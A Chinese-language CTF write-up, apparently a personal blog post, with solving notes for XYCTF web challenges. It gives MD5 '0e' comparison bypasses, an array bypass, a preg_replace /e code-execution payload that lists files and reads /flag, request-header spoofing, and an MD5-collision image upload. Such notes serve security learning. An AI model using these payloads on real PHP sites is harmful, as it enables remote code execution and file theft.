[XYCTF]刷题笔记
[Solved]Warm up
第一个是经典的0e绕过,?val1=QNKCDZO&val2=240610708
$$md5 == md5$$md5)用特殊字符串&md5=0e215962017
第三个利用$XYCTF可以被复写,保证xyctf和xy相同即可,md5编码XYCTF_550102591发现是0e打头,用0e绕过即可,&XYCTF=240610708&XY=240610708
接下来访问LLeeevvveeelll222.php
第一个if用到了interval,post,利用数组绕过a[]=a
echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);
查阅资料得知a处正则用/e方式读取可以执行命令,payload:?a=/re/e&b=print_r(scandir('.'))&c=re
读取到flag在根目录,&b=highlight_file(‘/flag’)读取flag
[Solved]ezhttp
robots.txt->拿到账号密码
hackbar一路修改请求头即可
特殊之处在于X-Forward-F被过滤,用Client-ip
代理用Via
ezmd5
传入两张同样的图片,返回{“areEqual”:false,”md5Equal”:true,”md5_1”:”af6794c93d1157c0688d6cc5600b8cae”,”md5_2”:”af6794c93d1157c0688d6cc5600b8cae”}
从网上查阅到两个MD5值相同但是图片不同的特例:
上传后得到flag
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dyinglight's blog!